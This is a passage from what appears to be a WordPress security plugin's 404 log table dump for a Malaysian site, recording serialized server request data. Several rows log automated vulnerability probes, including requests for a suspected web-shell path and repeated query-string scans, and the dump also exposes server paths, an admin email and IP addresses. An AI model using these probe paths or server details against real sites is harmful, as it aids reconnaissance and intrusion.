s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZh0m0GaeXEybixQimRZKAAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570272411.3346\";s:12:\"REQUEST_TIME\";s:10:\"1570272411\";}}','notice','2019-10-05 10:46:54','2019-10-05 10:46:51',35417784,37223536,'https://bintara.com.my/?page_id=18',1,0,'108.161.128.136'),(27535,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/1/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:3:\"/1/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZh1s0IBnEjhLICWLzN4KgAAARA\";s:19:\"REDIRECT_SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:3:\"/1/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZh1s0IBnEjhLICWLzN4KgAAARA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.194.131\";s:11:\"REMOTE_PORT\";s:5:\"32863\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:10:\"SCRIPT_URL\";s:3:\"/1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XZh1s0IBnEjhLICWLzN4KgAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570272691.2985\";s:12:\"REQUEST_TIME\";s:10:\"1570272691\";}}','notice','2019-10-05 10:51:34','2019-10-05 10:51:31',35031408,36834432,'https://bintara.com.my/1/?xxxxxxxxxxxx_loads=true',1,0,'128.199.194.131'),(27537,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZiGI0IBnEjhLICWLzN7rwAAAQs\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZiGI0IBnEjhLICWLzN7rwAAAQs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"81.88.49.51\";s:11:\"REMOTE_PORT\";s:5:\"14586\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php\";s:10:\"SCRIPT_URL\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiGI0IBnEjhLICWLzN7rwAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570276899.9398\";s:12:\"REQUEST_TIME\";s:10:\"1570276899\";}}','notice','2019-10-05 12:01:44','2019-10-05 12:01:40',35537816,37343784,'https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php',1,0,'81.88.49.51'),(27538,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZiGJUIBnEjhLICWLzN7sAAAAQ0\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZiGJUIBnEjhLICWLzN7sAAAAQ0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"81.88.49.46\";s:11:\"REMOTE_PORT\";s:5:\"44691\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php\";s:10:\"SCRIPT_URL\";s:42:\"/wp-includes/SimplePie/Content/Type/px.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiGJUIBnEjhLICWLzN7sAAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570276901.3137\";s:12:\"REQUEST_TIME\";s:10:\"1570276901\";}}','notice','2019-10-05 12:01:44','2019-10-05 12:01:41',35464976,37272440,'https://bintara.com.my/wp-includes/SimplePie/Content/Type/px.php',1,0,'81.88.49.46'),(27539,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=18\";s:15:\"HTTP_USER_AGENT\";s:126:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.166.142.222\";s:11:\"REMOTE_PORT\";s:5:\"23460\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiQ40GaeXEybixQimRo6wAAANE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570279651.5895\";s:12:\"REQUEST_TIME\";s:10:\"1570279651\";}}','notice','2019-10-05 12:47:33','2019-10-05 12:47:31',35020832,36824584,'https://bintara.com.my/?page_id=18',1,0,'46.166.142.222'),(27540,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/demo/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/demo/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZiWTEGaeXEybixQimRreQAAAMg\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/demo/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZiWTEGaeXEybixQimRreQAAAMg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"53187\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:10:\"SCRIPT_URL\";s:6:\"/demo/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiWTEGaeXEybixQimRreQAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570281036.7673\";s:12:\"REQUEST_TIME\";s:10:\"1570281036\";}}','notice','2019-10-05 13:10:39','2019-10-05 13:10:37',35430544,37231296,'https://bintara.com.my/demo/?xxxxxxxxxxxx_loads=true',1,0,'51.255.43.81'),(27541,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/2019/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/2019/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZiaf0GaeXEybixQimRt6wAAANQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2019/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZiaf0GaeXEybixQimRt6wAAANQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.198.246\";s:11:\"REMOTE_PORT\";s:5:\"48968\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:10:\"SCRIPT_URL\";s:6:\"/2019/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiaf0GaeXEybixQimRt6wAAANQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570282111.7016\";s:12:\"REQUEST_TIME\";s:10:\"1570282111\";}}','notice','2019-10-05 13:28:33','2019-10-05 13:28:32',35035152,36837160,'https://bintara.com.my/2019/?xxxxxxxxxxxx_loads=true',1,0,'37.187.198.246'),(27542,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-31/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-31/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZiipkGaeXEybixQimRybAAAANY\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-31/\";s:11:\"REMOTE_ADDR\";s:11:\"157.55.39.4\";s:11:\"REMOTE_PORT\";s:5:\"10016\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-31/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiipkGaeXEybixQimRybAAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570284198.578\";s:12:\"REQUEST_TIME\";s:10:\"1570284198\";}}','notice','2019-10-05 14:03:21','2019-10-05 14:03:18',34363320,36160920,'https://bintara.com.my/toughbook-31/',1,0,'157.55.39.4'),(27543,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/v1/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:26:\"https://bintara.com.my/v1/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:4:\"/v1/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZii-kGaeXEybixQimRyiAAAANA\";s:19:\"REDIRECT_SCRIPT_URI\";s:26:\"https://bintara.com.my/v1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:4:\"/v1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZii-kGaeXEybixQimRyiAAAANA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.198.246\";s:11:\"REMOTE_PORT\";s:5:\"46116\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:26:\"https://bintara.com.my/v1/\";s:10:\"SCRIPT_URL\";s:4:\"/v1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZii-kGaeXEybixQimRyiAAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570284286.7844\";s:12:\"REQUEST_TIME\";s:10:\"1570284286\";}}','notice','2019-10-05 14:04:48','2019-10-05 